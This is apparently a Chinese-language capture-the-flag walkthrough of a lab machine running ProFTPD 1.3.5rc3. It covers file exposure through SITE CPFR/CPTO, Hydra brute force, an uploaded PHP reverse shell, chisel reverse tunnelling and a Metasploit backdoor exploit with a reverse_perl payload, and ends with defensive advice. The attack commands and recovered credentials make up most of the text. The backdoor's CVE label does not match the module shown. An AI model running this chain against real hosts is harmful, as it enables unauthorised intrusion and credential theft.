ProFTPD 1.3.5rc3 漏洞利用与权限提升完整指南<\/h1>

1. 信息收集阶段<\/h2>

1.1 初始扫描<\/h3>
使用Nmap进行端口扫描：<\/p>
nmap -p- 192.168.101.148 --min-rate 1000<\/span> -sC -sV
<\/span><\/span><\/code><\/pre>扫描结果：<\/p>

21\/tcp: ProFTPD 1.3.5rc3<\/li>
80\/tcp: Apache httpd 2.4.7 (Ubuntu)<\/li>
2121\/tcp: 未明确服务<\/li>
<\/ul>
1.2 Web服务探测<\/h3>
访问HTTP服务：<\/p>
http:\/\/192.168.101.148\/
<\/code><\/pre>
页面标题："I Say... I say... I say Boy! You pumpin' for oil or somethin'...?"<\/p>
2. ProFTPD漏洞利用<\/h2>
2.1 利用SITE CPFR\/CPTO漏洞<\/h3>
ProFTPD 1.3.5rc3存在目录遍历漏洞，允许读取任意文件：<\/p>
ftp> site cpfr \/proc\/self\/root
<\/span><\/span>ftp> site cpto \/var\/www\/html\/root
<\/span><\/span><\/code><\/pre>通过Web访问泄露的文件：<\/p>
http:\/\/192.168.101.148\/root\/
http:\/\/192.168.101.148\/root\/etc\/passwd
<\/code><\/pre>
2.2 密码字典生成<\/h3>
使用cewl从网页生成密码字典：<\/p>
cewl -v 'https:\/\/en.wikipedia.org\/wiki\/Violator_(album)'<\/span> -d 1<\/span> -w violator.txt
<\/span><\/span>sed 's\/ \/\/g'<\/span> violator.txt > violator_nospaces
<\/span><\/span>cut -d'"'<\/span> -f2 violator_nospaces | tr '[:upper:]'<\/span> '[:lower:]'<\/span> > password.txt
<\/span><\/span><\/code><\/pre>2.3 FTP暴力破解<\/h3>
使用hydra进行FTP暴力破解：<\/p>
hydra -L username.txt -P password.txt ftp:\/\/192.168.101.148
<\/span><\/span><\/code><\/pre>成功获取的凭据：<\/p>

用户名: af 密码: enjoythesilence<\/li>
用户名: dg 密码: policyoftruth<\/li>
<\/ul>
3. 初始访问<\/h2>
3.1 上传Web Shell<\/h3>
使用获取的FTP凭据上传PHP反向Shell：<\/p>
cp \/usr\/share\/webshells\/php\/php-reverse-shell.php \/var\/www\/html
<\/span><\/span>ftp 192.168.101.148
<\/span><\/span>ftp> put \/var\/www\/html\/php-reverse-shell.php
<\/span><\/span><\/code><\/pre>访问Web Shell触发反向连接：<\/p>
http:\/\/192.168.101.148\/php-reverse-shell.php
<\/code><\/pre>
3.2 获取交互式Shell<\/h3>
在获得的Web Shell中升级为完全交互式终端：<\/p>
python -c 'import pty;pty.spawn("\/bin\/bash")'<\/span>
<\/span><\/span><\/code><\/pre>4. 权限提升<\/h2>
4.1 横向移动<\/h3>
切换到dg用户：<\/p>
su dg
<\/span><\/span>密码: policyoftruth
<\/span><\/span><\/code><\/pre>4.2 检查sudo权限<\/h3>
sudo -l
<\/span><\/span><\/code><\/pre>4.3 利用ProFTPD后门<\/h3>
发现可以执行特定路径的ProFTPD：<\/p>
sudo \/home\/dg\/bd\/sbin\/proftpd
<\/span><\/span><\/code><\/pre>检查本地监听端口：<\/p>
netstat -lnput
<\/span><\/span>发现2121端口已开放
<\/span><\/span><\/code><\/pre>4.4 端口转发<\/h3>
使用chisel进行端口转发：

攻击机：<\/p>
chisel server -p 8000<\/span> --reverse
<\/span><\/span><\/code><\/pre>目标机：<\/p>
.\/chisel client 192.168.101.128:8000 R:2121:127.0.0.1:2121&
<\/span><\/span><\/code><\/pre>4.5 利用Metasploit攻击后门<\/h3>
msfconsole
<\/span><\/span>use exploit\/unix\/ftp\/proftpd_133c_backdoor
<\/span><\/span>set payload cmd\/unix\/reverse_perl
<\/span><\/span>set lhost 192.168.101.128
<\/span><\/span>set rhost 127.0.0.1
<\/span><\/span>set rport 2121<\/span>
<\/span><\/span>exploit
<\/span><\/span><\/code><\/pre>5. 获取最终flag<\/h2>
5.1 读取flag文件<\/h3>
cat \/root\/flag.txt
<\/span><\/span><\/code><\/pre>5.2 传输文件<\/h3>
在目标机启动HTTP服务：<\/p>
python3 -m http.server 9999<\/span>
<\/span><\/span><\/code><\/pre>5.3 破解压缩包密码<\/h3>
rar2john crocs.rar > hash
<\/span><\/span>john hash --wordlist=<\/span>..\/Desktop\/password.txt
<\/span><\/span>获取密码: World in My Eyes
<\/span><\/span>unrar x crocs.rar
<\/span><\/span><\/code><\/pre>5.4 图片信息分析<\/h3>
使用工具分析图片：<\/p>
exiftool artwork.jpg
<\/span><\/span><\/code><\/pre>使用ImageToAscii工具：<\/p>
https:\/\/github.com\/MartinxMax\/ImageToAscii
<\/span><\/span><\/code><\/pre>5.5 解密Enigma密码<\/h3>
使用在线工具解密：<\/p>
https:\/\/www.dcode.fr\/enigma-machine-cipher
解密结果: BGHX
<\/code><\/pre>
6. 关键发现总结<\/h2>


ProFTPD 1.3.5rc3存在两个关键漏洞：<\/p>

SITE CPFR\/CPTO目录遍历漏洞<\/li>
后门漏洞(CVE-2006-5815)<\/li>
<\/ul>
<\/li>

密码策略分析：<\/p>

密码与Depeche Mode专辑"Violator"相关<\/li>
使用专辑相关词汇生成字典成功破解<\/li>
<\/ul>
<\/li>

权限提升路径：<\/p>

通过Web Shell获取初始访问<\/li>
利用FTP凭据横向移动<\/li>
滥用sudo权限执行特定ProFTPD二进制文件<\/li>
利用后门获取root权限<\/li>
<\/ul>
<\/li>

最终flag获取涉及多层挑战：<\/p>

压缩包密码破解<\/li>
图片隐写分析<\/li>
Enigma密码解密<\/li>
<\/ul>
<\/li>
<\/ol>
7. 防御建议<\/h2>

及时更新ProFTPD到最新版本<\/li>
禁用不必要的SITE命令<\/li>
实施严格的sudo权限控制<\/li>
使用强密码策略，避免与系统主题相关的弱密码<\/li>
定期进行漏洞扫描和安全审计<\/li>
限制FTP用户的文件系统访问范围<\/li>
监控异常的网络连接和端口开放情况<\/li>
<\/ol>